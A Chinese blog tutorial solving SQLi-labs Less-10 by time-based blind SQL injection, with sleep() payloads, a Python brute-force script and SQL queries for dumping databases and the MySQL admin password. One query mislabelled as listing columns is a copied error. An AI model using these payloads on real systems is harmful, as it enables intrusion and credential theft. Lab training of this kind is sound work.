SQLi LABS Less 10 时间盲注

已于 2024-12-29 09:35:40 修改
阅读量1.5w 收藏 5
点赞数 10
分类专栏: 《靶场实战》 文章标签: 安全 网络安全 web安全
于 2021-06-27 21:15:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/wangyuxiang946/article/details/118279730
版权

 「作者简介」:冬奥会网络安全中国代表队,优快云 Top100,就职奇安信多年,以实战工作为基础著作 《网络安全自学教程》,适合基础薄弱的同学系统化的学习网络安全,用最短的时间掌握最核心的技术。

第十关是双引号字符型注入,推荐使用时间盲注。

一、功能分析

二、思路分析

三、解题步骤

方式一:时间盲注

第一步、判断注入条件

第二步、判断长度

第三步、枚举字符

脱库

一、功能分析

二、思路分析

页面无显示位,不适合联合注入;

页面不显示数据库的报错信息,不适合报错注入;

查询的正确和错误不会影响页面的响应(后台写死了,只返回You are in...........),不适合布尔盲注;

综上所述,尝试使用时间盲注。

三、解题步骤

方式一:时间盲注

第一步、判断注入条件

地址栏输入:?id=1" and if(1,sleep(5),3) -- a

页面响应时间超过5秒,确定存在时间盲注。

第二步、判断长度

判断当前使用数据库的名字长度是否大于1,地址栏输入:

?id=1" and if(
	(length(
		database()
	) >1)
,sleep(5),3) -- a

长度肯定大于1,页面延时5秒,确定payload可用。

从1开始,依次递增测试长度,页面响应时间超过5秒则表示猜解成功,稍后使用脚本自动化猜解。

第三步、枚举字符

截取当前使用数据库名字的第一个字符,通过穷举法判断具体字符。

为了方便脚本测试,这里将字符转换成ASCLL。

判断第一个字符的ASCLL是否大于1,地址栏输入:

?id=1" and if(
	(ascii(
		substr(
			(database()
		),1,1)
	) >1)
,sleep(5),3) -- a

肯定大于1,页面延时5秒,确定payload可用。

穷举第一个字符的所有可能性(对应的ASCLL为:32~126),穷举成功后,再依法穷举剩余字符,稍后使用脚本自动化猜解。

脱库

Python自动化脚本如下,可按需修改:

import requests
import time

# 将url 替换成你的靶场关卡网址
# 修改两个对应的payload

# 目标网址(不带参数)
url = "http://00b5c770b91b4b7aae704c39602fc0f9.app.mituan.zone/Less-10/"
# 猜解长度使用的payload
payload_len = """?id=1" and if(
	(length(
		(database())
	) ={n})
,sleep(5),3) -- a"""
# 枚举字符使用的payload
payload_str = """?id=1" and if(
	(ascii(
		substr(
			(database())
		,{n},1)
	) ={r})
,sleep(5),3) -- a"""

# 获取长度
def getLength(url, payload):
    length = 1  # 初始测试长度为1
    while True:
        start_time = time.time()
        response = requests.get(url= url+payload_len.format(n= length))
        # 页面响应时间 = 结束执行的时间 - 开始执行的时间
        use_time = time.time() - start_time
        # 响应时间>5秒时,表示猜解成功
        if use_time > 5:
            print('测试长度完成,长度为:', length,)
            return length;
        else:
            print('正在测试长度:',length)
            length += 1  # 测试长度递增

# 获取字符
def getStr(url, payload, length):
    str = ''  # 初始表名/库名为空
    # 第一层循环,截取每一个字符
    for l in range(1, length+1):
        # 第二层循环,枚举截取字符的每一种可能性
        for n in range(33, 126):
            start_time = time.time()
            response = requests.get(url= url+payload_str.format(n= l, r= n))
            # 页面响应时间 = 结束执行的时间 - 开始执行的时间
            use_time = time.time() - start_time
            # 页面中出现此内容则表示成功
            if use_time > 5:
                str+= chr(n)
                print('第', l, '个字符猜解成功:', str)
                break;
    return str;

# 开始猜解
length = getLength(url, payload_len)
getStr(url, payload_str, length)

执行结果如下:

其他脱库操作时,将圈起来的部分替换成SQL语句即可:

 

 脱库常用SQL语句:

# 获取所有数据库
(select group_concat(schema_name)
from information_schema.schemata)
 
# 获取 security 库的所有表
(select group_concat(table_name)
from information_schema.tables
where table_schema="security")
 
# 获取 users 表的所有字段
(select group_concat(table_name)
from information_schema.tables
where table_schema="security")
 
# 获取数据库管理员的密码
(select password
from mysql.user
where user="mituan")

SQL注入实例(sqli-labs/less-9)
Thewei666的博客
08-05 489
使用python脚本。
SQLi LABS Less-7 布尔盲注_sqli靶场第七关使用盲注(1)
2301_82056337的博客
05-17 522
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。id=1’)) and 0 – a,页面异常(空)显示。id=1’)) and 1 – a,页面正常显示。判断成立,页面正常显示,文末使用Python脚本自动化判断。判断成立,页面正常显示,文末使用Python脚本自动化判断。获取 security 库的所有表。获取 users 表的所有字段。因篇幅有限,仅展示部分资料。
Sqli-labs less 10
weixin_34122548的博客
08-11 152
Less-10 本关我们从标题就可以看到 《基于时间-双引号》,所以很明显的这关要我们利用延时注入进行,同时id参数进行的是 " 的处理。和less9的区别就在于单引号(')变成了("),我们这里给出一个payload示例,其他的请参考less-9 猜测数据库: http://127.0.0.1/sqllib/Less-10/?id=1"and%20If(ascii(substr(data...
SQL 注入(盲注)
最新发布
2501_91606508的博客
04-13 416
当SLEEP()被禁用后,攻击者依然可以使用、大量嵌套计算、正则表达式等方式来模拟响应延迟,从而实现时间盲注。让数据库“累到慢”,再根据响应时间判断条件真假。
sqli-labs ————less -10
Fly_鹏程万里
05-11 515
Less-10查看源代码:由此可见,这里是一个基于时间注入的双引号注入。猜测数据库:http://192.168.11.136/sqli-labs/Less-10?id=1" and if (ascii(substr(database(),1,1))=115),1,sleep(5)) --+之后的猜测表名、字段名、字段值与上一关的基本相同,唯一不同之处就是“ ' ”与“ ””。这里就不再多复述了。...
sqlilabs less10
TA不懒,但还没有添加简介
06-27 225
sqlilabs less10
SQLI-Lab】-Less10
xinyue9966的博客
01-27 379
Less-10 GET - Blind - Time based - double quotes (基于时间的双引号盲注)前言一、GET字符型注入二、步骤总结 前言 一、GET字符型注入 执行数据库查询,并在回显点展示。 用户可以看到数据库查询出错时的错误语句,就可以观察报错语句分析出查询语句结构,从而构造特殊的payload进行注入,并从回显点中获取想要的信息。 二、步骤 和第7题思路过程一样,不过不需要写入、闭合字段后,开始用burp suite爆,具体过程不再细讲。 盲注爆库长度payload htt
sqli-lab靶场学习(三)——Less8-10(盲注、时间盲注
sadoshi的专栏
09-19 773
sqli-lab 8-10关,涉及盲注
sqli-labs Less-5(布尔盲注)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
01-31 778
前几篇sql注入文章 sqli-labs Less-1(联合注入、字符型注入) sqli-labs Less-2(联合注入、整形型注入) sqli-labs Less-3(联合注入、字符型注入) sqli-labs Less-4(联合注入、字符型注入) sqli-labs Less-5(利用extractvalue进行报错注入) sqli-labs Less-5(双注入) 布尔盲注其实就是构造一个SQL语句,当语句成立时,页面会返回特点的标识,语句不成立是返回其他,或无数据。因此我们可以构造一个判断语句,利
sqli-labs Less-5盲注脚本
01-18
### 关于 sqli-labsLess-5 的盲注攻击 在 `sqli-labs` 实验室中的 Less-5 部分涉及到了基于布尔的盲注 SQL 注入。这种类型的注入通过向应用程序发送特定构造的查询来推断数据库的内容,而不会使错误消息显示给...
sqli-labs Less-8(布尔盲注)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-11 725
布尔盲注其实就是构造一个SQL语句,当语句成立时,页面会返回特点的标识,语句不成立是返回其他,或无数据。因此我们可以构造一个判断语句,利用页面的返回结果来得知判断语句是否正确。 再学习布尔盲注之前,一些常用函数如下: length(): 返回字符串长度。 substr(str, start, len): 截取str,从start开始,截取长度为len。 ascii(): 返回字符串的ascii码。 1、判断共有几个数据库 payload ?id=1' and (select count(schema_na
sqli-labs靶场Less-10
songling515010475的专栏
08-25 402
1、访问首页,/Less-10/index.php?id=1,这里的传参点是id 探测六步 判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 判断是否是延时盲注 http://192.168.60.142:8080/sqlilabs/Less-10/index.php?id=1 ' and sleep(10)-- qwe 分析:这里使用的是双引号闭合+延时盲注,和第9关一样的操作,只是闭合不一样。 2、使用 i..
sqli-labs/Less-10
m0_71299382的博客
11-09 177
sqli-labs第十关
sqli-labs Less-10
qq_42630215的博客
03-25 262
Less-10 Get - Blind -Time based -double quotes 基于时间的盲注 (Less-9 与Less-10的区别在于一个是单引号一个是双引号,其他判断步骤一致) 正确的直接返回,错误的时候等待5秒钟。 1.猜测数据库: ?id=1” and If(ascii(substr(database(),1,1))=115,1,sleep(5))–+ ?id=1” a...
sqli-labsless-10
羽的博客
07-21 103
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; char...
网络安全sqli-labs Less-9 解题详析
等风来
07-23 3958
页面延迟明显,说明第一个字符的ASCII值大于等于100。页面延迟明显,说明第一个字符的ASCII值大于90。延迟明显,说明第一个表名称的第一个字符为 e。延迟明显,说明第一个列名的第一个字符为i。延迟明显,说明第一个表名称长度为 6。页面延迟明显,说明第一个字符为 s。最终得到第一个表名称为emails。延迟明显,说明第一列名称长度为 2。回显延迟,说明数据库名长度为8。页面延迟明显,说明表个数为 4。获取第一个列名的第一个字符。延迟明显,说明列数为 2。判断第一个字符,输入。
sqli-lab教程Less-10
Brucye
03-23 496
less-10 sqli-lab通过各种方式(整型注入,字符注入,报错注入,布尔盲注,时间盲注,堆叠注入…)爆出库表字段拿到字段值。 时间盲注 学习sqli注入必备语句: 查库:select schema_name from information_schema.schemata 查表:select table_name from information_schema.tables where table_schema=‘security’(此处拿security库为例) 查字段:select c
sqli-labs:Less-1-Less-10
打代码的小女孩
11-17 770
less 1 ~less 10都是get型的 less 1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入) 我们得到了登陆名 Dumb 和密码 Dump。我们在URL上添加了一个参数,并让这个参数指向第一条记录。这是便生成了一个从浏览器到数据库的表中的一个快速的查询,从而来获取“id=1”的记录。同样,你可以构造查询...
Sqli-labsLess1-10
Mi1k7ea
04-14 4658
为了更好地学习SQL注入,便从sqli-labs开始入手吧。很多东西都是不懂,所以也是从各位前辈、大牛的博客以及书籍中去学习,将自己学到的都记录一下,以便以后的查看。同时也希望各位能够多多给点指导,让本人能够更好地掌握各种方法技巧等等。 为了更方便地实现操作,直接用Firefox的HackBar插件来操作~ Less1--基于错误的单引号字符型注入 直接在url中输入?id=1可以看
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

士别三日wyx

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值